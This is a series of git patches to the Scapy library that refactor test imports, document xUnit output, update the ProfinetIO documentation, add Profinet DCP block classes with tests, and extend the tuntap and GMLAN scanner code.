exec(open("test/contrib/automotive/interface_mockup.py").read()) -else: - execfile("test/contrib/automotive/interface_mockup.py") +with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: + exec(f.read()) ############ diff --git a/test/contrib/automotive/xcp/xcp_comm.uts b/test/contrib/automotive/xcp/xcp_comm.uts index d0d70a6574e..d20ddf77b14 100644 --- a/test/contrib/automotive/xcp/xcp_comm.uts +++ b/test/contrib/automotive/xcp/xcp_comm.uts @@ -10,13 +10,8 @@ = Imports -import scapy.modules.six as six - -if six.PY3: - exec(open("test/contrib/automotive/interface_mockup.py").read()) -else: - execfile("test/contrib/automotive/interface_mockup.py") - +with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: + exec(f.read()) = Load module diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index b1e77a532c1..622b362284f 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -13,10 +13,8 @@ from scapy.contrib.isotp.isotp_scanner import get_isotp_packet import scapy.modules.six as six -if six.PY3: - exec(open("test/contrib/automotive/interface_mockup.py").read()) -else: - execfile("test/contrib/automotive/interface_mockup.py") +with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: + exec(f.read()) = Definition of constants, utility functions and mock classes diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index 643c58a91d1..41b9f6eda52 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -6,13 +6,10 @@ ~ conf = Imports -import scapy.modules.six as six from scapy.contrib.isotp.isotp_scanner import send_multiple_ext, filter_periodic_packets, scan_extended, scan -if six.PY3: - exec(open("test/contrib/automotive/interface_mockup.py").read()) -else: - execfile("test/contrib/automotive/interface_mockup.py") +with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: + exec(f.read()) = Test send_multiple_ext() diff --git a/test/tools/isotpscanner.uts b/test/tools/isotpscanner.uts index 12532c85843..fad05112fdc 100644 --- a/test/tools/isotpscanner.uts +++ b/test/tools/isotpscanner.uts @@ -6,12 +6,8 @@ ~ conf = Imports -import scapy.modules.six as six - -if six.PY3: - exec(open("test/contrib/automotive/interface_mockup.py").read()) -else: - execfile("test/contrib/automotive/interface_mockup.py") +with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: + exec(f.read()) ISOTPSocket = ISOTPSoftSocket diff --git a/test/tools/obdscanner.uts b/test/tools/obdscanner.uts index ef562b75171..4dfa467f3c2 100644 --- a/test/tools/obdscanner.uts +++ b/test/tools/obdscanner.uts @@ -5,12 +5,8 @@ ~ conf = Imports -import scapy.modules.six as six - -if six.PY3: - exec(open("test/contrib/automotive/interface_mockup.py").read()) -else: - execfile("test/contrib/automotive/interface_mockup.py") +with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: + exec(f.read()) + Usage tests diff --git a/test/tools/xcpscanner.uts b/test/tools/xcpscanner.uts index 00a972e5539..f519c000e44 100644 --- a/test/tools/xcpscanner.uts +++ b/test/tools/xcpscanner.uts @@ -9,12 +9,9 @@ + Basic operations = Imports -import scapy.modules.six as six -if six.PY3: - exec(open("test/contrib/automotive/interface_mockup.py").read()) -else: - execfile("test/contrib/automotive/interface_mockup.py") +with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: + exec(f.read()) + Tests XCPonCAN Scanner From c2169cc5297bf0d74fb8045cc7a442ebc6bbd25a Mon Sep 17 00:00:00 2001 From: Max Date: Tue, 10 Aug 2021 20:09:57 +0200 Subject: [PATCH 0626/1632] Python 3: remove unnecesary string encoding in UTscapy Signed-off-by: Max --- scapy/tools/UTscapy.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 4fde0986d3a..9c0cf7fa1f1 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -676,8 +676,8 @@ def campaign_to_xUNIT(test_campaign): output = '\n\n' for testset in test_campaign: for t in testset: - output += ' Date: Tue, 10 Aug 2021 20:11:53 +0200 Subject: [PATCH 0627/1632] UTscapy: document xUnit format support Signed-off-by: Max --- scapy/tools/UTscapy.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 9c0cf7fa1f1..9c8b388c835 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -820,7 +820,7 @@ def campaign_to_LATEX(test_campaign): # USAGE # def usage(): - print("""Usage: UTscapy [-m module] [-f {text|ansi|HTML|LaTeX|live}] [-o output_file] + print("""Usage: UTscapy [-m module] [-f {text|ansi|HTML|LaTeX|xUnit|live}] [-o output_file] [-t testfile] [-T testfile] [-k keywords [-k ...]] [-K keywords [-K ...]] [-l] [-b] [-d|-D] [-F] [-q[q]] [-i] [-P preexecute_python_code] [-c configfile] From 2cbe0886f7890bf8160b06b57e9b1b16f0428364 Mon Sep 17 00:00:00 2001 From: Chris Packham Date: Tue, 17 Aug 2021 17:26:44 +1200 Subject: [PATCH 0628/1632] docs: layers/pnio: Update ProfinetIO documentation The ProfinetIO contrib layer underwent a fairly major re-write but the documentation still reflected the old code. Update it to reflect the current code and provide examples that are actually valid. Some of the features for packet dissection were removed so the last section of the documentation has been removed. Signed-off-by: Chris Packham --- doc/scapy/layers/pnio.rst | 326 +++++++++++--------------------------- 1 file changed, 94 insertions(+), 232 deletions(-) diff --git a/doc/scapy/layers/pnio.rst b/doc/scapy/layers/pnio.rst index b3b37486575..49b9441c0b1 100644 --- a/doc/scapy/layers/pnio.rst +++ b/doc/scapy/layers/pnio.rst @@ -7,263 +7,125 @@ PROFINET IO is an industrial protocol composed of different layers such as the R RTC data packet --------------- -The first thing to do when building the RTC ``data`` buffer is to instantiate each Scapy packet which represents a piece of data. Each one of them may require some specific piece of configuration, such as its length. All packets and their configuration are: +The first thing to do when building the RTC ``data`` buffer is to instantiate each Scapy packet which represents a piece of data. Some of the basic packets are: -* ``PNIORealTimeRawData``: a simple raw data like ``Raw`` +* ``ProfinetIO``: the building block for PROFINET packets. Can be layered on top of Ether() or UDP() - * ``length``: defines the length of the data +* ``PROFIsafe``: the PROFIsafe profile to perform functional safety -* ``Profisafe``: the PROFIsafe profile to perform functional safety +* ``PNIORealTime_IOxS``: either an IO Consumer or Provider Status byte - * ``length``: defines the length of the whole packet - * ``CRC``: defines the length of the CRC, either ``3`` or ``4`` +Instantiate the packets as follows:: -* ``PNIORealTimeIOxS``: either an IO Consumer or Provider Status byte - - * Doesn't require any configuration - -To instantiate one of these packets with its configuration, the ``config`` argument must be given. It is a ``dict()`` which contains all the required piece of configuration:: - - >>> load_contrib('pnio_rtc') - >>> raw(PNIORealTimeRawData(load='AAA', config={'length': 4})) - 'AAA\x00' - >>> raw(Profisafe(load='AAA', Control_Status=0x20, CRC=0x424242, config={'length': 8, 'CRC': 3})) - 'AAA\x00 BBB' - >>> hexdump(PNIORealTimeIOxS()) + >>> load_contrib('pnio') + >>> raw(ProfinetIO()/b'AAA') + b'\x00\x00AAA' + >>> raw(PROFIsafe.build_PROFIsafe_class(PROFIsafeControl, 4)(data = b'AAA', control=0x20, crc=0x424242)) + b'AAA\x00 BBB' + >>> hexdump(PNIORealTime_IOxS()) 0000 80 . RTC packet ---------- -Now that a data packet can be instantiated, a whole RTC packet may be built. ``PNIORealTime`` contains a field ``data`` which is a list of all data packets to add in the buffer, however, without the configuration, Scapy won't be +Now that a data packet can be instantiated, a whole RTC packet may be built. ``PNIORealTimeCyclicPDU`` contains a field ``data`` which is a list of all data packets to add in the buffer, however, without the configuration, Scapy won't be able to dissect it:: - >>> load_contrib("pnio_rtc") - >>> p=PNIORealTime(cycleCounter=1024, data=[ - ... PNIORealTimeIOxS(), - ... PNIORealTimeRawData(load='AAA', config={'length':4}) / PNIORealTimeIOxS(), - ... Profisafe(load='AAA', Control_Status=0x20, CRC=0x424242, config={'length': 8, 'CRC': 3}) / PNIORealTimeIOxS(), + >>> load_contrib('pnio') + >>> p=PNIORealTimeCyclicPDU(cycleCounter=1024, data=[ + ... PNIORealTime_IOxS(), + ... PNIORealTimeCyclicPDU.build_fixed_len_raw_type(4)(data = b'AAA') / PNIORealTime_IOxS(), + ... PROFIsafe.build_PROFIsafe_class(PROFIsafeControl, 4)(data = b'AAA', control=0x20, crc=0x424242)/PNIORealTime_IOxS(), ... ]) >>> p.show() - ###[ PROFINET Real-Time ]### - len= None - dataLen= None - \data\ - |###[ PNIO RTC IOxS ]### - | dataState= good - | instance= subslot - | reserved= 0x0 - | extension= 0 - |###[ PNIO RTC Raw data ]### - | load= 'AAA' - |###[ PNIO RTC IOxS ]### - | dataState= good - | instance= subslot - | reserved= 0x0 - | extension= 0 - |###[ PROFISafe ]### - | load= 'AAA' - | Control_Status= 0x20 - | CRC= 0x424242 - |###[ PNIO RTC IOxS ]### - | dataState= good - | instance= subslot - | reserved= 0x0 - | extension= 0 - padding= '' - cycleCounter= 1024 - dataStatus= primary+validData+run+no_problem - transferStatus= 0 - - >>> p.show2() - ###[ PROFINET Real-Time ]### - len= 44 - dataLen= 15 - \data\ - |###[ PNIO RTC Raw data ]### - | load= '\x80AAA\x00\x80AAA\x00 BBB\x80' - padding= '' - cycleCounter= 1024 - dataStatus= primary+validData+run+no_problem - transferStatus= 0 - -For Scapy to be able to dissect it correctly, one must also configure the layer for it to know the location of each data in the buffer. This configuration is saved in the dictionary ``conf.contribs["PNIO_RTC"]`` which can be updated with the ``pnio_update_config`` method. Each item in the dictionary uses the tuple ``(Ether.src, Ether.dst)`` as key, to be able to separate the configuration of each communication. Each value is then a list of a tuple which describes a data packet. It is composed of the negative index, from the end of the data buffer, of the packet position, the class of the packet as the second item and the ``config`` dictionary to provide to the class as last. If we continue the previous example, here is the configuration to set:: - - >>> load_contrib("pnio") - >>> e=Ether(src='00:01:02:03:04:05', dst='06:07:08:09:0a:0b') / ProfinetIO() / p - >>> e.show2() - ###[ Ethernet ]### - dst= 06:07:08:09:0a:0b - src= 00:01:02:03:04:05 - type= 0x8892 - ###[ ProfinetIO ]### - frameID= RT_CLASS_1 - ###[ PROFINET Real-Time ]### - len= 44 - dataLen= 15 - \data\ - |###[ PNIO RTC Raw data ]### - | load= '\x80AAA\x00\x80AAA\x00 BBB\x80' - padding= '' + ###[ PROFINET Real-Time ]### + \data \ + |###[ PNIO RTC IOxS ]### + | dataState = good + | instance = subslot + | reserved = 0x0 + | extension = 0 + |###[ FixedLenRawPacketLen4 ]### + | data = 'AAA' + |###[ PNIO RTC IOxS ]### + | dataState = good + | instance = subslot + | reserved = 0x0 + | extension = 0 + |###[ PROFISafe Control Message with F_CRC_Seed=0 ]### + | dat( = 'AAA' + | control = Toggle_h + | crc = 0x424242 + |###[ PNIO RTC IOxS ]### + | dataState = good + | instance = subslot + | reserved = 0x0 + | extension = 0 + padding = '' cycleCounter= 1024 dataStatus= primary+validData+run+no_problem transferStatus= 0 - >>> pnio_update_config({('00:01:02:03:04:05', '06:07:08:09:0a:0b'): [ - ... (-9, Profisafe, {'length': 8, 'CRC': 3}), - ... (-9 - 5, PNIORealTimeRawData, {'length':4}), - ... ]}) - >>> e.show2() - ###[ Ethernet ]### - dst= 06:07:08:09:0a:0b - src= 00:01:02:03:04:05 - type= 0x8892 - ###[ ProfinetIO ]### - frameID= RT_CLASS_1 - ###[ PROFINET Real-Time ]### - len= 44 - dataLen= 15 - \data\ - |###[ PNIO RTC IOxS ]### - | dataState= good - | instance= subslot - | reserved= 0x0L - | extension= 0L - |###[ PNIO RTC Raw data ]### - | load= 'AAA' - |###[ PNIO RTC IOxS ]### - | dataState= good - | instance= subslot - | reserved= 0x0L - | extension= 0L - |###[ PROFISafe ]### - | load= 'AAA' - | Control_Status= 0x20 - | CRC= 0x424242L - |###[ PNIO RTC IOxS ]### - | dataState= good - | instance= subslot - | reserved= 0x0L - | extension= 0L - padding= '' - cycleCounter= 1024 - dataStatus= primary+validData+run+no_problem - transferStatus= 0 - -If no data packets are configured for a given offset, it defaults to a ``PNIORealTimeIOxS``. However, this method is not very convenient for the user to configure the layer and it only affects the dissection of packets. In such cases, one may have access to several RTC packets, sniffed or retrieved from a PCAP file. Thus, ``PNIORealTime`` provides some methods to analyse a list of ``PNIORealTime`` packets and locate all data in it, based on simple heuristics. All of them take as first argument an iterable which contains the list of packets to analyse. -* ``PNIORealTime.find_data()`` analyses the data buffer and separate real data from IOxS. It returns a dict which can be provided to ``pnio_update_config``. -* ``PNIORealTime.find_profisafe()`` analyses the data buffer and find the PROFIsafe profiles among the real data. It returns a dict which can be provided to ``pnio_update_config``. -* ``PNIORealTime.analyse_data()`` executes both previous methods and update the configuration. **This is usually the method to call.** -* ``PNIORealTime.draw_entropy()`` will draw the entropy of each byte in the data buffer. It can be used to easily visualize PROFIsafe locations as entropy is the base of the decision algorithm of ``find_profisafe``. -:: +For Scapy to be able to dissect it correctly, one must also configure the layer for it to know the location of each data in the buffer. This configuration is saved in the dictionary ``conf.contribs["PNIO_RTC"]`` which can be updated with the ``conf.contribs["PNIO_RTC"].update`` method. Each item in the dictionary uses the tuple ``(Ether.src, Ether.dst, ProfinetIO.frameID)`` as key, to be able to separate the configuration of each communication. Each value is then a list of classes which describes a data packet. If we continue the previous example, here is the configuration to set:: - >>> load_contrib('pnio_rtc') - >>> t=rdpcap('/path/to/trace.pcap', 1024) - >>> PNIORealTime.analyse_data(t) - {('00:01:02:03:04:05', '06:07:08:09:0a:0b'): [(-19, , {'length': 1}), (-15, , {'CRC': 3, 'length': 6}), (-7, , {'CRC': 3, 'length': 5})]} - >>> t[100].show() + >>> e=Ether(src='00:01:02:03:04:05', dst='06:07:08:09:0a:0b') / ProfinetIO(frameID="RT_CLASS_1") / p + >>> e.show2() ###[ Ethernet ]### - dst= 06:07:08:09:0a:0b - src= 00:01:02:03:04:05 - type= n_802_1Q - ###[ 802.1Q ]### - prio= 6L - id= 0L - vlan= 0L - type= 0x8892 + dst = 06:07:08:09:0a:0b + src = 00:01:02:03:04:05 + type = 0x8892 ###[ ProfinetIO ]### - frameID= RT_CLASS_1 + frameID = RT_CLASS_1 (8000) ###[ PROFINET Real-Time ]### - len= 44 - dataLen= 22 - \data\ - |###[ PNIO RTC Raw data ]### - | load= '\x80\x80\x80\x80\x80\x80\x00\x80\x80\x80\x12:\x0e\x12\x80\x80\x00\x12\x8b\x97\xe3\x80' - padding= '' - cycleCounter= 6208 - dataStatus= primary+validData+run+no_problem - transferStatus= 0 - - >>> t[100].show2() + \data \ + |###[ PROFINET IO Real Time Cyclic Default Raw Data ]### + | data = '\\x80AAA\x00\\x80AAA\x00 BBB\\x80' + padding = '' + cycleCounter= 1024 + dataStatus= primary+validData+run+no_problem + transferStatus= 0 + >>> conf.contribs["PNIO_RTC"].update({('00:01:02:03:04:05', '06:07:08:09:0a:0b', 0x8000): [ + ... PNIORealTime_IOxS, + ... PNIORealTimeCyclicPDU.build_fixed_len_raw_type(4), + ... PNIORealTime_IOxS, + ... PROFIsafe.build_PROFIsafe_class(PROFIsafeControl, 4), + ... PNIORealTime_IOxS, + ... ]}) + >>> e.show2() ###[ Ethernet ]### - dst= 06:07:08:09:0a:0b - src= 00:01:02:03:04:05 - type= n_802_1Q - ###[ 802.1Q ]### - prio= 6L - id= 0L - vlan= 0L - type= 0x8892 + dst = 06:07:08:09:0a:0b + src = 00:01:02:03:04:05 + type = 0x8892 ###[ ProfinetIO ]### - frameID= RT_CLASS_1 + frameID = RT_CLASS_1 (8000) ###[ PROFINET Real-Time ]### - len= 44 - dataLen= 22 - \data\ - |###[ PNIO RTC IOxS ]### - | dataState= good - | instance= subslot - | reserved= 0x0L - | extension= 0L - [...] - |###[ PNIO RTC IOxS ]### - | dataState= good - | instance= subslot - | reserved= 0x0L - | extension= 0L - |###[ PNIO RTC Raw data ]### - | load= '' - |###[ PNIO RTC IOxS ]### - | dataState= good - | instance= subslot - | reserved= 0x0L - | extension= 0L - [...] - |###[ PNIO RTC IOxS ]### - | dataState= good - | instance= subslot - | reserved= 0x0L - | extension= 0L - |###[ PROFISafe ]### - | load= '' - | Control_Status= 0x12 - | CRC= 0x3a0e12L - |###[ PNIO RTC IOxS ]### - | dataState= good - | instance= subslot - | reserved= 0x0L - | extension= 0L - |###[ PNIO RTC IOxS ]### - | dataState= good - | instance= subslot - | reserved= 0x0L - | extension= 0L - |###[ PROFISafe ]### - | load= '' - | Control_Status= 0x12 - | CRC= 0x8b97e3L - |###[ PNIO RTC IOxS ]### - | dataState= good - | instance= subslot - | reserved= 0x0L - | extension= 0L - padding= '' - cycleCounter= 6208 - dataStatus= primary+validData+run+no_problem - transferStatus= 0 - -In addition, one can see, when displaying a ``PNIORealTime`` packet, the field ``len``. This is a computed field which is not added in the final packet build. It is mainly useful for dissection and reconstruction, but it can also be used to modify the behaviour of the packet. In fact, RTC packet must always be long enough for an Ethernet frame and to do so, a padding must be added right after the ``data`` buffer. The default behaviour is to add ``padding`` whose size is computed during the ``build`` process:: - - >>> raw(PNIORealTime(cycleCounter=0x4242, data=[PNIORealTimeIOxS()])) - '\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00BB5\x00' - -However, one can set ``len`` to modify this behaviour. ``len`` controls the length of the whole ``PNIORealTime`` packet. Then, to shorten the length of the padding, ``len`` can be set to a lower value:: + \data \ + |###[ PNIO RTC IOxS ]### + | dataState = good + | instance = subslot + | reserved = 0x0 + | extension = 0 + |###[ FixedLenRawPacketLen4 ]### + | data = 'AAA' + |###[ PNIO RTC IOxS ]### + | dataState = good + | instance = subslot + | reserved = 0x0 + | extension = 0 + |###[ PROFISafe Control Message with F_CRC_Seed=0 ]### + | data = 'AAA' + | control = Toggle_h + | crc = 0x424242 + |###[ PNIO RTC IOxS ]### + | dataState = good + | instance = subslot + | reserved = 0x0 + | extension = 0 + padding = '' + cycleCounter= 1024 + dataStatus= primary+validData+run+no_problem + transferStatus= 0 - >>> raw(PNIORealTime(cycleCounter=0x4242, data=[PNIORealTimeIOxS()], len=50)) - '\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00BB5\x00' - >>> raw(PNIORealTime(cycleCounter=0x4242, data=[PNIORealTimeIOxS()])) - '\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00BB5\x00' - >>> raw(PNIORealTime(cycleCounter=0x4242, data=[PNIORealTimeIOxS()], len=30)) - '\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00BB5\x00' +If no data packets are configured for a given offset, it defaults to a ``PNIORealTimeCyclicDefaultRawData``. From 008e4e442887680074619572a067ac4fa9960e34 Mon Sep 17 00:00:00 2001 From: Octavian Toader Date: Thu, 22 Jul 2021 18:24:16 +0300 Subject: [PATCH 0629/1632] Added Profinet DCP packets -> DCPDeviceInitiativeBlock and DCPOEMIDBlock. --- scapy/contrib/pnio_dcp.py | 36 ++++++++++++++++++++++++++++++++++-- 1 file changed, 34 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/pnio_dcp.py b/scapy/contrib/pnio_dcp.py index e5ec6801a55..496eaa74668 100644 --- a/scapy/contrib/pnio_dcp.py +++ b/scapy/contrib/pnio_dcp.py @@ -385,6 +385,22 @@ class DCPDeviceInstanceBlock(Packet): def extract_padding(self, s): return '', s +class DCPOEMIDBlock(Packet): + fields_desc = [ + ByteEnumField("option", 2, DCP_OPTIONS), + MultiEnumField("sub_option", 8, DCP_SUBOPTIONS, fmt='B', + depends_on=lambda p: p.option), + LenField("dcp_block_length", None), + ShortEnumField("block_info", 0, BLOCK_INFOS), + XShortField("vendor_id", 0x002a), + XShortField("device_id", 0x0313), + PadField(StrLenField("padding", b"\x00", + length_from=lambda p: p.dcp_block_length % 2), 1, + padwith=b"\x00") + ] + + def extract_padding(self, s): + return '', s class DCPControlBlock(Packet): fields_desc = [ @@ -405,6 +421,22 @@ def extract_padding(self, s): return '', s +class DCPDeviceInitiativeBlock(Packet): + """ + device initiative DCP block + """ + fields_desc = [ + ByteEnumField("option", 6, DCP_OPTIONS), + MultiEnumField("sub_option", 1, DCP_SUBOPTIONS, fmt='B', + depends_on=lambda p: p.option), + FieldLenField("dcp_block_length", None, length_of="device_initiative"), + ShortEnumField("block_info", 0, BLOCK_INFOS), + ShortField("device_initiative", 1), + ] + + def extract_padding(self, s): + return '', s + def guess_dcp_block_class(packet, **kargs): """ returns the correct dcp block class needed to dissect the current tag @@ -436,7 +468,7 @@ def guess_dcp_block_class(packet, **kargs): 0x05: "DCPDeviceOptionsBlock", 0x06: "DCPAliasNameBlock", 0x07: "DCPDeviceInstanceBlock", - 0x08: "OEM Device ID" + 0x08: "DCPOEMIDBlock" }, # DHCP 0x03: @@ -466,7 +498,7 @@ def guess_dcp_block_class(packet, **kargs): 0x06: { 0x00: "Reserved (0x00)", - 0x01: "Device Initiative (0x01)" + 0x01: "DCPDeviceInitiativeBlock" }, # ALL Selector 0xff: From d3f84ff73a6daecf5d8d80c7e81e8ae8a5c6e829 Mon Sep 17 00:00:00 2001 From: Octavian Toader Date: Mon, 2 Aug 2021 15:31:58 +0300 Subject: [PATCH 0630/1632] Added test for DCPOEMIDBlock and DCPDeviceInitiativeBlock. --- scapy/contrib/pnio_dcp.py | 3 +++ test/contrib/pnio_dcp.uts | 53 +++++++++++++++++++++++++++++++++++++++ 2 files changed, 56 insertions(+) diff --git a/scapy/contrib/pnio_dcp.py b/scapy/contrib/pnio_dcp.py index 496eaa74668..11c8d209e4b 100644 --- a/scapy/contrib/pnio_dcp.py +++ b/scapy/contrib/pnio_dcp.py @@ -385,6 +385,7 @@ class DCPDeviceInstanceBlock(Packet): def extract_padding(self, s): return '', s + class DCPOEMIDBlock(Packet): fields_desc = [ ByteEnumField("option", 2, DCP_OPTIONS), @@ -402,6 +403,7 @@ class DCPOEMIDBlock(Packet): def extract_padding(self, s): return '', s + class DCPControlBlock(Packet): fields_desc = [ ByteEnumField("option", 5, DCP_OPTIONS), @@ -437,6 +439,7 @@ class DCPDeviceInitiativeBlock(Packet): def extract_padding(self, s): return '', s + def guess_dcp_block_class(packet, **kargs): """ returns the correct dcp block class needed to dissect the current tag diff --git a/test/contrib/pnio_dcp.uts b/test/contrib/pnio_dcp.uts index c7d8f753503..22771d0b2b6 100644 --- a/test/contrib/pnio_dcp.uts +++ b/test/contrib/pnio_dcp.uts @@ -130,6 +130,59 @@ assert(p[DCPIPBlock].ip == "192.168.1.14") assert(p[DCPIPBlock].netmask == "255.255.255.0") assert(p[DCPIPBlock].gateway == "192.168.1.14") += DCP Identify Response parsing with new DCP packages (DCPOEMIDBlock, DCPDeviceInitiativeBlock) + +p = Ether(b'\x01\x0e\xcf\x00\x00\x00\x01\x23\x45\x67\x89\xab\x88\x92' \ + b'\xfe\xff\x05\x01\x01\x00\x00\x01\x00\x00\x00\x7a\x02\x02\x00\x02\x00' \ + b'\x00\x01\x02\x00\x0e\x00\x01\xc0\xa8\x01\x0b\xff\xff\xff\x00\x00\x00' \ + b'\x00\x00\x02\x03\x00\x06\x00\x00\x01\x6a\x04\x00\x02\x05\x00\x16\x00' \ + b'\x00\x01\x01\x01\x02\x02\x01\x02\x02\x02\x03\x02\x04\x02\x05\x02\x07' \ + b'\x02\x08\x06\x01\x02\x04\x00\x04\x00\x00\x01\x00\x06\x01\x00\x04\x00' \ + b'\x00\x00\x00\x02\x01\x00\x18\x00\x00\x31\x32\x33\x34\x20\x44\x44\x44' + b'\x20\x33\x58\x58\x32\x2d\x31\x32\x31\x2d\x30\x46\x44\x44\x02\x07\x00' \ + b'\x04\x00\x00\x00\x01\x02\x08\x00\x06\x00\x00\x01\x1e\xff\xff') + +# - General +assert(p[Ether].dst == '01:0e:cf:00:00:00') +assert(p[Ether].src == '01:23:45:67:89:ab') +assert(p[Ether].type == 0x8892) +assert(p[ProfinetIO].frameID == 0xFEFF) +assert(p[ProfinetDCP].service_id == 0x05) +assert(p[ProfinetDCP].service_type == 0x01) +assert(p[ProfinetDCP].xid == 0x1000001) +assert(p[ProfinetDCP].reserved == 0x00) +assert(p[ProfinetDCP].dcp_data_length == 122) +assert(list(map(lambda x: type(x), p[ProfinetDCP].dcp_blocks)) == [DCPNameOfStationBlock, DCPIPBlock, DCPDeviceIDBlock, DCPDeviceOptionsBlock, DCPDeviceRoleBlock, DCPDeviceInitiativeBlock, DCPManufacturerSpecificBlock, DCPDeviceInstanceBlock, DCPOEMIDBlock]) + +# - DCPNameOfStationBlock +assert(p[DCPNameOfStationBlock].option == 0x02) +assert(p[DCPNameOfStationBlock].sub_option == 0x02) + +# - DCPIPBlock +assert(p[DCPIPBlock].option == 0x01) +assert(p[DCPIPBlock].sub_option == 0x02) +assert(p[DCPIPBlock].dcp_block_length == 0x0E) +assert(p[DCPIPBlock].ip == '192.168.1.11') +assert(p[DCPIPBlock].netmask == '255.255.255.0') +assert(p[DCPIPBlock].gateway == '0.0.0.0') + +# - DCPDeviceInitiativeBlock +assert(p[DCPDeviceInitiativeBlock].option == 0x06) +assert(p[DCPDeviceInitiativeBlock].sub_option == 0x01) +assert(p[DCPDeviceInitiativeBlock].dcp_block_length == 0x04) +assert(p[DCPDeviceInitiativeBlock].device_initiative == 0x0000) + +# - DCPManufacturerSpecificBlock +assert(p[DCPManufacturerSpecificBlock].option == 0x02) +assert(p[DCPManufacturerSpecificBlock].sub_option == 0x01) +assert(p[DCPManufacturerSpecificBlock].device_vendor_value == b'1234 DDD 3XX2-121-0FDD') + +# - DCPOEMIDBlock +assert(p[DCPOEMIDBlock].option == 0x02) +assert(p[DCPOEMIDBlock].sub_option == 0x08) +assert(p[DCPOEMIDBlock].dcp_block_length == 0x06) +assert(p[DCPOEMIDBlock].vendor_id == 0x011e) +assert(p[DCPOEMIDBlock].device_id == 0xffff) = DCP Set Request parsing From 1de3e849687afb776eed7abc2aa98469d3e25a1b Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 24 Aug 2021 11:33:23 +0200 Subject: [PATCH 0631/1632] Support NetworkInterface for tuntap --- scapy/layers/tuntap.py | 5 ++++- test/tuntap.uts | 3 ++- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/scapy/layers/tuntap.py b/scapy/layers/tuntap.py index a664980cfbe..cd9314ccb9b 100644 --- a/scapy/layers/tuntap.py +++ b/scapy/layers/tuntap.py @@ -24,6 +24,7 @@ from scapy.data import ETHER_TYPES, MTU from scapy.error import warning, log_runtime from scapy.fields import Field, FlagsField, StrFixedLenField, XShortEnumField +from scapy.interfaces import network_name from scapy.layers.inet import IP from scapy.layers.inet6 import IPv46, IPv6 from scapy.layers.l2 import Ether @@ -113,7 +114,9 @@ class TunTapInterface(SimpleSocket): def __init__(self, iface=None, mode_tun=None, default_read_size=MTU, strip_packet_info=True, *args, **kwargs): - self.iface = bytes_encode(conf.iface if iface is None else iface) + self.iface = bytes_encode( + network_name(conf.iface if iface is None else iface) + ) self.mode_tun = mode_tun if self.mode_tun is None: diff --git a/test/tuntap.uts b/test/tuntap.uts index 1f9ea346eeb..34fdba9ce36 100644 --- a/test/tuntap.uts +++ b/test/tuntap.uts @@ -80,7 +80,8 @@ if not LINUX: import subprocess -tun0 = TunTapInterface("tun0", strip_packet_info=False) +iface = resolve_iface("tun0") # test TunTapInterface on NetworkInterface +tun0 = TunTapInterface(iface, strip_packet_info=False) assert subprocess.check_call(["ip", "link", "set", "tun0", "up"]) == 0 assert subprocess.check_call([ From 6ac2f4bfc21ce8fdd6899bd17036c1bdb97391f3 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 27 Aug 2021 15:38:40 +0200 Subject: [PATCH 0632/1632] Split #3054 gmlan scanner (#3283) --- .config/mypy/mypy_enabled.txt | 2 +- scapy/contrib/automotive/ecu.py | 30 +- .../contrib/automotive/gm/gmlan_ecu_states.py | 4 +- scapy/contrib/automotive/gm/gmlan_scanner.py | 679 ++++++++++++++++++ scapy/contrib/automotive/gm/gmlanutils.py | 3 +- .../contrib/automotive/scanner/enumerator.py | 110 ++- test/contrib/automotive/gm/scanner.uts | 476 ++++++++++++ .../contrib/automotive/scanner/enumerator.uts | 4 + test/pcaps/candump_gmlan_scanner.log.gz | Bin 0 -> 28893 bytes 9 files changed, 1265 insertions(+), 43 deletions(-) create mode 100644 scapy/contrib/automotive/gm/gmlan_scanner.py create mode 100644 test/contrib/automotive/gm/scanner.uts create mode 100644 test/pcaps/candump_gmlan_scanner.log.gz diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 28ebedd8f78..6114991ae59 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -51,6 +51,7 @@ scapy/contrib/automotive/doip.py scapy/contrib/automotive/ecu.py scapy/contrib/automotive/gm/gmlan_ecu_states.py scapy/contrib/automotive/gm/gmlan_logging.py +scapy/contrib/automotive/gm/gmlan_scanner.py scapy/contrib/automotive/gm/gmlanutils.py scapy/contrib/automotive/kwp.py scapy/contrib/automotive/obd/scanner.py @@ -71,4 +72,3 @@ scapy/contrib/isotp/isotp_scanner.py 